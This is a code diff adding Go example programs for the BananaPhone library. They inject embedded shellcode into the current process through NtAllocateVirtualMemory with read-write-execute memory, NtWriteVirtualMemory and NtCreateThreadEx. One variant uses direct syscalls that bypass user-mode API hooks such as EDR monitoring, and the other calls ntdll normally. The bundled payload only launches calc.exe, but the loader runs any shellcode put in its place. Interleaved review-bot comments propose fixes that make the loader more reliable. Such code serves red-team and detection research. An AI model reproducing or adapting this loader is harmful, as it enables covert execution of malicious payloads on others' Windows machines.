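--- a/example/hideexample/banana/main.go
+++ b/example/hideexample/banana/main.go
@@ -0,0 +1,62 @@
+package main
+
+import (
+ "syscall"
+)
+
+var shellcode = []byte{
+ //calc.exe https://github.com/peterferrie/win-exec-calc-shellcode
+ 0x31, 0xc0, 0x50, 0x68, 0x63, 0x61, 0x6c, 0x63,
+ 0x54, 0x59, 0x50, 0x40, 0x92, 0x74, 0x15, 0x51,
+ 0x64, 0x8b, 0x72, 0x2f, 0x8b, 0x76, 0x0c, 0x8b,
+ 0x76, 0x0c, 0xad, 0x8b, 0x30, 0x8b, 0x7e, 0x18,
+ 0xb2, 0x50, 0xeb, 0x1a, 0xb2, 0x60, 0x48, 0x29,
+ 0xd4, 0x65, 0x48, 0x8b, 0x32, 0x48, 0x8b, 0x76,
+ 0x18, 0x48, 0x8b, 0x76, 0x10, 0x48, 0xad, 0x48,
+ 0x8b, 0x30, 0x48, 0x8b, 0x7e, 0x30, 0x03, 0x57,
+ 0x3c, 0x8b, 0x5c, 0x17, 0x28, 0x8b, 0x74, 0x1f,
+ 0x20, 0x48, 0x01, 0xfe, 0x8b, 0x54, 0x1f, 0x24,
+ 0x0f, 0xb7, 0x2c, 0x17, 0x8d, 0x52, 0x02, 0xad,
+ 0x81, 0x3c, 0x07, 0x57, 0x69, 0x6e, 0x45, 0x75,
+ 0xef, 0x8b, 0x74, 0x1f, 0x1c, 0x48, 0x01, 0xfe,
+ 0x8b, 0x34, 0xae, 0x48, 0x01, 0xf7, 0x99, 0xff,
+ 0xd7,
+}
+
+func main() {
+ const (
+ thisThread = uintptr(0xffffffffffffffff) //special macro that says 'use this thread/process' when provided as a handle.
+ memCommit = uintptr(0x00001000)
+ memreserve = uintptr(0x00002000)
+ )
+
+ var baseA uintptr
+ regionsize := uint32(len(shellcode))
+ NtAllocateVirtualMemory(thisThread,
+ &baseA,
+ 0,
+ &regionsize,
+ uint32(memCommit|memreserve),
+ syscall.PAGE_EXECUTE_READWRITE,
+ )
+ var written uintptr
+ NtWriteVirtualMemory(thisThread, baseA, &shellcode[0], uintptr(len(shellcode)), &written)
+
+ var hhosthread uintptr
+ NtCreateThreadEx( //NtCreateThreadEx
+ &hhosthread, //hthread
+ 0x1FFFFF, //desiredaccess
+ 0, //objattributes
+ thisThread, //processhandle
+ baseA, //lpstartaddress
+ 0, //lpparam
+ uintptr(0), //createsuspended
+ 0, //zerobits
+ 0, //sizeofstackcommit
+ 0, //sizeofstackreserve
+ 0, //lpbytesbuffer
+ )
+ syscall.WaitForSingleObject(syscall.Handle(hhosthread), 0xffffffff)
+
+}
+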
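Review bot: Every status returned by NtAllocateVirtualMemory, NtWriteVirtualMemory and NtCreateThreadEx on lines 35–58 is discarded, so when the allocation fails baseA stays 0 and the write and the thread creation still run against that address. Each call should be checked and the program stopped before the next step, which for an example is as simple as `if err := NtAllocateVirtualMemory(thisThread, &baseA, 0, &regionsize, uint32(memCommit|memreserve), syscall.PAGE_EXECUTE_READWRITE); err != nil { panic(err) }` repeated for the other two calls. The constant on line 28 is passed as the process handle, so the name `thisThread` and its comment are misleading; `thisProcess` with `//pseudo-handle (-1) meaning 'the current process' when passed as a process handle` would be accurate. The WaitForSingleObject result on line 59 is dropped as well. example/hideexample/nobanana/main.go contains the same code and has the same issues.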
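--- a/example/hideexample/banana/syscalls.go
+++ b/example/hideexample/banana/syscalls.go
@@ -0,0 +1,9 @@
+package main
+
+//dsys NtWriteVirtualMemory(hProcess uintptr, lpBaseAddress uintptr, lpBuffer *byte, nSize uintptr, lpNumberOfBytesWritten *uintptr) (err error) = ntdll.NtWriteVirtualMemory
+//dsys NtAllocateVirtualMemory(hProcess uintptr, lpAddress *uintptr, zerobits uintptr, dwSize *uint32, flAllocationType uint32, flProtect uint32) (err error) = ntdll.NtAllocateVirtualMemory
+//dsys NtProtectVirtualMemory(hProcess uintptr, lpAddress *uintptr, dwSize *uintptr, flNewProtect uint32, lpflOldProtect *uint32) (err error) = ntdll.NtProtectVirtualMemory
+//dsys NtCreateThreadEx(hThread *uintptr, desiredaccess uintptr, objattrib uintptr, processhandle uintptr, lpstartaddr uintptr, lpparam uintptr, createsuspended uintptr, zerobits uintptr, sizeofstack uintptr, sizeofstackreserve uintptr, lpbytesbuffer uintptr) (err error) = ntdll.NtCreateThreadEx
+
+//go:generate go run github.com/C-Sto/BananaPhone/cmd/mkdirectwinsyscall -trace -output zsyscall_windows.go syscalls.go
+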
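Review bot: The wrapper generated from each of these declarations (zsyscall_windows.go lines 19–20, 38–39, 57–58 and 76–77) formats `bperr.Error()` when bpGlobal is nil, which dereferences a nil pointer if NewBananaPhone ever yields a nil phone together with a nil error; passing the value itself, `err = fmt.Errorf("BananaPhone uninitialised: %v", bperr)`, reports the same text without that risk. The change belongs in the mkdirectwinsyscall template rather than in the DO NOT EDIT output, and as far as this page shows the generator is not part of this commit, so I can only flag it here. NtProtectVirtualMemory on line 5 is declared but nothing in main.go calls it, so its wrapper is dead code; either drop the line or add a comment saying why it is kept.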
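--- a/example/hideexample/banana/zsyscall_windows.go
+++ b/example/hideexample/banana/zsyscall_windows.go
@@ -0,0 +1,93 @@
+// Code generated by 'go generate'; DO NOT EDIT.
+
+package main
+
+import (
+ "fmt"
+ "unsafe"
+
+ bananaphone "github.com/C-Sto/BananaPhone/pkg/BananaPhone"
+)
+
+var _ unsafe.Pointer
+
+var (
+ bpGlobal, bperr = bananaphone.NewBananaPhone(bananaphone.AutoBananaPhoneMode)
+)
+
+func NtWriteVirtualMemory(hProcess uintptr, lpBaseAddress uintptr, lpBuffer *byte, nSize uintptr, lpNumberOfBytesWritten *uintptr) (err error) {
+ if bpGlobal == nil {
+ err = fmt.Errorf("BananaPhone uninitialised: %s", bperr.Error())
+ return
+ }
+
+ sysid, e := bpGlobal.GetSysID("NtWriteVirtualMemory")
+ if e != nil {
+ err = e
+ return
+ }
+ r1, _ := bananaphone.Syscall(sysid, uintptr(hProcess), uintptr(lpBaseAddress), uintptr(unsafe.Pointer(lpBuffer)), uintptr(nSize), uintptr(unsafe.Pointer(lpNumberOfBytesWritten)))
+ if r1 != 0 {
+ err = fmt.Errorf("error code: %x", r1)
+ }
+ print("SYSCALL: NtWriteVirtualMemory(", "hProcess=", hProcess, ", ", "lpBaseAddress=", lpBaseAddress, ", ", "lpBuffer=", lpBuffer, ", ", "nSize=", nSize, ", ", "lpNumberOfBytesWritten=", lpNumberOfBytesWritten, ") (", "err=", err, ")\n")
+ return
+}
+
+func NtAllocateVirtualMemory(hProcess uintptr, lpAddress *uintptr, zerobits uintptr, dwSize *uint32, flAllocationType uint32, flProtect uint32) (err error) {
+ if bpGlobal == nil {
+ err = fmt.Errorf("BananaPhone uninitialised: %s", bperr.Error())
+ return
+ }
+
+ sysid, e := bpGlobal.GetSysID("NtAllocateVirtualMemory")
+ if e != nil {
+ err = e
+ return
+ }
+ r1, _ := bananaphone.Syscall(sysid, uintptr(hProcess), uintptr(unsafe.Pointer(lpAddress)), uintptr(zerobits), uintptr(unsafe.Pointer(dwSize)), uintptr(flAllocationType), uintptr(flProtect))
+ if r1 != 0 {
+ err = fmt.Errorf("error code: %x", r1)
+ }
+ print("SYSCALL: NtAllocateVirtualMemory(", "hProcess=", hProcess, ", ", "lpAddress=", lpAddress, ", ", "zerobits=", zerobits, ", ", "dwSize=", dwSize, ", ", "flAllocationType=", flAllocationType, ", ", "flProtect=", flProtect, ") (", "err=", err, ")\n")
+ return
+}
+
+func NtProtectVirtualMemory(hProcess uintptr, lpAddress *uintptr, dwSize *uintptr, flNewProtect uint32, lpflOldProtect *uint32) (err error) {
+ if bpGlobal == nil {
+ err = fmt.Errorf("BananaPhone uninitialised: %s", bperr.Error())
+ return
+ }
+
+ sysid, e := bpGlobal.GetSysID("NtProtectVirtualMemory")
+ if e != nil {
+ err = e
+ return
+ }
+ r1, _ := bananaphone.Syscall(sysid, uintptr(hProcess), uintptr(unsafe.Pointer(lpAddress)), uintptr(unsafe.Pointer(dwSize)), uintptr(flNewProtect), uintptr(unsafe.Pointer(lpflOldProtect)))
+ if r1 != 0 {
+ err = fmt.Errorf("error code: %x", r1)
+ }
+ print("SYSCALL: NtProtectVirtualMemory(", "hProcess=", hProcess, ", ", "lpAddress=", lpAddress, ", ", "dwSize=", dwSize, ", ", "flNewProtect=", flNewProtect, ", ", "lpflOldProtect=", lpflOldProtect, ") (", "err=", err, ")\n")
+ return
+}
+
+func NtCreateThreadEx(hThread *uintptr, desiredaccess uintptr, objattrib uintptr, processhandle uintptr, lpstartaddr uintptr, lpparam uintptr, createsuspended uintptr, zerobits uintptr, sizeofstack uintptr, sizeofstackreserve uintptr, lpbytesbuffer uintptr) (err error) {
+ if bpGlobal == nil {
+ err = fmt.Errorf("BananaPhone uninitialised: %s", bperr.Error())
+ return
+ }
+
+ sysid, e := bpGlobal.GetSysID("NtCreateThreadEx")
+ if e != nil {
+ err = e
+ return
+ }
+ r1, _ := bananaphone.Syscall(sysid, uintptr(unsafe.Pointer(hThread)), uintptr(desiredaccess), uintptr(objattrib), uintptr(processhandle), uintptr(lpstartaddr), uintptr(lpparam), uintptr(createsuspended), uintptr(zerobits), uintptr(sizeofstack), uintptr(sizeofstackreserve), uintptr(lpbytesbuffer))
+ if r1 != 0 {
+ err = fmt.Errorf("error code: %x", r1)
+ }
+ print("SYSCALL: NtCreateThreadEx(", "hThread=", hThread, ", ", "desiredaccess=", desiredaccess, ", ", "objattrib=", objattrib, ", ", "processhandle=", processhandle, ", ", "lpstartaddr=", lpstartaddr, ", ", "lpparam=", lpparam, ", ", "createsuspended=", createsuspended, ", ", "zerobits=", zerobits, ", ", "sizeofstack=", sizeofstack, ", ", "sizeofstackreserve=", sizeofstackreserve, ", ", "lpbytesbuffer=", lpbytesbuffer, ") (", "err=", err, ")\n")
+ return
+}
+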
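--- a/example/hideexample/nobanana/main.go
+++ b/example/hideexample/nobanana/main.go
@@ -0,0 +1,62 @@
+package main
+
+import (
+ "syscall"
+)
+
+var shellcode = []byte{
+ //calc.exe https://github.com/peterferrie/win-exec-calc-shellcode
+ 0x31, 0xc0, 0x50, 0x68, 0x63, 0x61, 0x6c, 0x63,
+ 0x54, 0x59, 0x50, 0x40, 0x92, 0x74, 0x15, 0x51,
+ 0x64, 0x8b, 0x72, 0x2f, 0x8b, 0x76, 0x0c, 0x8b,
+ 0x76, 0x0c, 0xad, 0x8b, 0x30, 0x8b, 0x7e, 0x18,
+ 0xb2, 0x50, 0xeb, 0x1a, 0xb2, 0x60, 0x48, 0x29,
+ 0xd4, 0x65, 0x48, 0x8b, 0x32, 0x48, 0x8b, 0x76,
+ 0x18, 0x48, 0x8b, 0x76, 0x10, 0x48, 0xad, 0x48,
+ 0x8b, 0x30, 0x48, 0x8b, 0x7e, 0x30, 0x03, 0x57,
+ 0x3c, 0x8b, 0x5c, 0x17, 0x28, 0x8b, 0x74, 0x1f,
+ 0x20, 0x48, 0x01, 0xfe, 0x8b, 0x54, 0x1f, 0x24,
+ 0x0f, 0xb7, 0x2c, 0x17, 0x8d, 0x52, 0x02, 0xad,
+ 0x81, 0x3c, 0x07, 0x57, 0x69, 0x6e, 0x45, 0x75,
+ 0xef, 0x8b, 0x74, 0x1f, 0x1c, 0x48, 0x01, 0xfe,
+ 0x8b, 0x34, 0xae, 0x48, 0x01, 0xf7, 0x99, 0xff,
+ 0xd7,
+}
+
+func main() {
+ const (
+ thisThread = uintptr(0xffffffffffffffff) //special macro that says 'use this thread/process' when provided as a handle.
+ memCommit = uintptr(0x00001000)
+ memreserve = uintptr(0x00002000)
+ )
+
+ var baseA uintptr
+ regionsize := uint32(len(shellcode))
+ NtAllocateVirtualMemory(thisThread,
+ &baseA,
+ 0,
+ &regionsize,
+ uint32(memCommit|memreserve),
+ syscall.PAGE_EXECUTE_READWRITE,
+ )
+ var written uintptr
+ NtWriteVirtualMemory(thisThread, baseA, &shellcode[0], uintptr(len(shellcode)), &written)
+
+ var hhosthread uintptr
+ NtCreateThreadEx( //NtCreateThreadEx
+ &hhosthread, //hthread
+ 0x1FFFFF, //desiredaccess
+ 0, //objattributes
+ thisThread, //processhandle
+ baseA, //lpstartaddress
+ 0, //lpparam
+ uintptr(0), //createsuspended
+ 0, //zerobits
+ 0, //sizeofstackcommit
+ 0, //sizeofstackreserve
+ 0, //lpbytesbuffer
+ )
+ syscall.WaitForSingleObject(syscall.Handle(hhosthread), 0xffffffff)
+
+}
+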
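--- a/example/hideexample/nobanana/syscalls.go
+++ b/example/hideexample/nobanana/syscalls.go
@@ -0,0 +1,8 @@
+package main
+
+//sys NtWriteVirtualMemory(hProcess uintptr, lpBaseAddress uintptr, lpBuffer *byte, nSize uintptr, lpNumberOfBytesWritten *uintptr) (err error) = ntdll.NtWriteVirtualMemory
+//sys NtAllocateVirtualMemory(hProcess uintptr, lpAddress *uintptr, zerobits uintptr, dwSize *uint32, flAllocationType uint32, flProtect uint32) (err error) = ntdll.NtAllocateVirtualMemory
+//sys NtCreateThreadEx(hThread *uintptr, desiredaccess uintptr, objattrib uintptr, processhandle uintptr, lpstartaddr uintptr, lpparam uintptr, createsuspended uintptr, zerobits uintptr, sizeofstack uintptr, sizeofstackreserve uintptr, lpbytesbuffer uintptr) (err error) = ntdll.NtCreateThreadEx
+
+//go:generate go run $GOPATH/src/golang.org/x/sys/windows/mkwinsyscall -trace -output zsyscalls_windows.go syscalls.go
+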
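Review bot: Declaring these NTSTATUS-returning functions with an `(err error)` result makes mkwinsyscall apply the Win32 BOOL convention: the generated zsyscalls_windows.go (lines 49–55, 62–68 and 75–81) treats r1 == 0, which is STATUS_SUCCESS, as failure and reports `syscall.EINVAL` when GetLastError is clear, while a non-zero NTSTATUS comes back as err == nil. main.go never checks these errors, which is why the inversion goes unnoticed, but anyone who starts checking them will see every successful call flagged. Newer mkwinsyscall versions accept an `(ntstatus error)` result that maps a non-zero r1 to a windows.NTStatus error, which would be the right declaration here if the version in use supports it. The directive on line 7 also resolves the generator through `$GOPATH/src/...`, which only works in GOPATH mode; `//go:generate go run golang.org/x/sys/windows/mkwinsyscall -trace -output zsyscalls_windows.go syscalls.go` works in module mode and matches the form used in the banana variant.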
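--- a/example/hideexample/nobanana/zsyscalls_windows.go
+++ b/example/hideexample/nobanana/zsyscalls_windows.go
@@ -0,0 +1,85 @@
+// Code generated by 'go generate'; DO NOT EDIT.
+
+package main
+
+import (
+ "syscall"
+ "unsafe"
+
+ "golang.org/x/sys/windows"
+)
+
+var _ unsafe.Pointer
+
+// Do the interface allocations only once for common
+// Errno values.
+const (
+ errnoERROR_IO_PENDING = 997
+)
+
+var (
+ errERROR_IO_PENDING error = syscall.Errno(errnoERROR_IO_PENDING)
+)
+
+// errnoErr returns common boxed Errno values, to prevent
+// allocations at runtime.
+func errnoErr(e syscall.Errno) error {
+ switch e {
+ case 0:
+ return nil
+ case errnoERROR_IO_PENDING:
+ return errERROR_IO_PENDING
+ }
+ // TODO: add more here, after collecting data on the common
+ // error values see on Windows. (perhaps when running
+ // all.bat?)
+ return e
+}
+
+var (
+ modntdll = windows.NewLazySystemDLL("ntdll.dll")
+
+ procNtWriteVirtualMemory = modntdll.NewProc("NtWriteVirtualMemory")
+ procNtAllocateVirtualMemory = modntdll.NewProc("NtAllocateVirtualMemory")
+ procNtCreateThreadEx = modntdll.NewProc("NtCreateThreadEx")
+)
+
+func NtWriteVirtualMemory(hProcess uintptr, lpBaseAddress uintptr, lpBuffer *byte, nSize uintptr, lpNumberOfBytesWritten *uintptr) (err error) {
+ r1, _, e1 := syscall.Syscall6(procNtWriteVirtualMemory.Addr(), 5, uintptr(hProcess), uintptr(lpBaseAddress), uintptr(unsafe.Pointer(lpBuffer)), uintptr(nSize), uintptr(unsafe.Pointer(lpNumberOfBytesWritten)), 0)
+ if r1 == 0 {
+ if e1 != 0 {
+ err = errnoErr(e1)
+ } else {
+ err = syscall.EINVAL
+ }
+ }
+ print("SYSCALL: NtWriteVirtualMemory(", "hProcess=", hProcess, ", ", "lpBaseAddress=", lpBaseAddress, ", ", "lpBuffer=", lpBuffer, ", ", "nSize=", nSize, ", ", "lpNumberOfBytesWritten=", lpNumberOfBytesWritten, ") (", "err=", err, ")\n")
+ return
+}
+
+func NtAllocateVirtualMemory(hProcess uintptr, lpAddress *uintptr, zerobits uintptr, dwSize *uint32, flAllocationType uint32, flProtect uint32) (err error) {
+ r1, _, e1 := syscall.Syscall6(procNtAllocateVirtualMemory.Addr(), 6, uintptr(hProcess), uintptr(unsafe.Pointer(lpAddress)), uintptr(zerobits), uintptr(unsafe.Pointer(dwSize)), uintptr(flAllocationType), uintptr(flProtect))
+ if r1 == 0 {
+ if e1 != 0 {
+ err = errnoErr(e1)
+ } else {
+ err = syscall.EINVAL
+ }
+ }
+ print("SYSCALL: NtAllocateVirtualMemory(", "hProcess=", hProcess, ", ", "lpAddress=", lpAddress, ", ", "zerobits=", zerobits, ", ", "dwSize=", dwSize, ", ", "flAllocationType=", flAllocationType, ", ", "flProtect=", flProtect, ") (", "err=", err, ")\n")
+ return
+}
+
+func NtCreateThreadEx(hThread *uintptr, desiredaccess uintptr, objattrib uintptr, processhandle uintptr, lpstartaddr uintptr, lpparam uintptr, createsuspended uintptr, zerobits uintptr, sizeofstack uintptr, sizeofstackreserve uintptr, lpbytesbuffer uintptr) (err error) {
+ r1, _, e1 := syscall.Syscall12(procNtCreateThreadEx.Addr(), 11, uintptr(unsafe.Pointer(hThread)), uintptr(desiredaccess), uintptr(objattrib), uintptr(processhandle), uintptr(lpstartaddr), uintptr(lpparam), uintptr(createsuspended), uintptr(zerobits), uintptr(sizeofstack), uintptr(sizeofstackreserve), uintptr(lpbytesbuffer), 0)
+ if r1 == 0 {
+ if e1 != 0 {
+ err = errnoErr(e1)
+ } else {
+ err = syscall.EINVAL
+ }
+ }
+ print("SYSCALL: NtCreateThreadEx(", "hThread=", hThread, ", ", "desiredaccess=", desiredaccess, ", ", "objattrib=", objattrib, ", ", "processhandle=", processhandle, ", ", "lpstartaddr=", lpstartaddr, ", ", "lpparam=", lpparam, ", ", "createsuspended=", createsuspended, ", ", "zerobits=", zerobits, ", ", "sizeofstack=", sizeofstack, ", ", "sizeofstackreserve=", sizeofstackreserve, ", ", "lpbytesbuffer=", lpbytesbuffer, ") (", "err=", err, ")\n")
+ return
+}
+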